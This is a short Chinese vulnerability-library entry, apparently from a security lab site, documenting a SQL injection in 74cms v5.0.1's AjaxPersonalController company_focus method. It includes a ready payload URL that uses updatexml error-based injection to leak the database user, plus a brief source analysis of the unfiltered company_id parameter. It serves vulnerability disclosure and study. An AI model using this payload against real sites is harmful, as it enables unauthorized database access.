74cms v5.0.1 前台sql注入-漏洞文库小世界-安全文库-NGC660 安全实验室

74cms v5.0.1 前台sql注入

74cms v5.0.1 前台sql注入

一、漏洞简介

74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入

二、漏洞影响

三、复现过程

具体信息

文件位置:74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php

方法:function company_focus($company_id)

是否需登录:需要

登录权限:普通用户即可

Payload:

http://url/74cms/5.0.1/upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa%22) and updatexml(1,concat(0x7e,(select user())),0) -- a

3c5ab74817a4c7fc9113c5567dc2c2bc

源码分析:

文件:74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php

company_focus 方法是参数化函数,$company_id参数是不经过I函数过滤的,所以只要where可以控制,那就可以注入

f45f73ac6946e43e334e56691a377f92

跟踪add_focus(),发现SQL语句参数外部都可以控制,导致了注入漏洞

329a2bcf10db20d1bff465ecd18c53b2

请登录后发表评论

    请登录后查看回复内容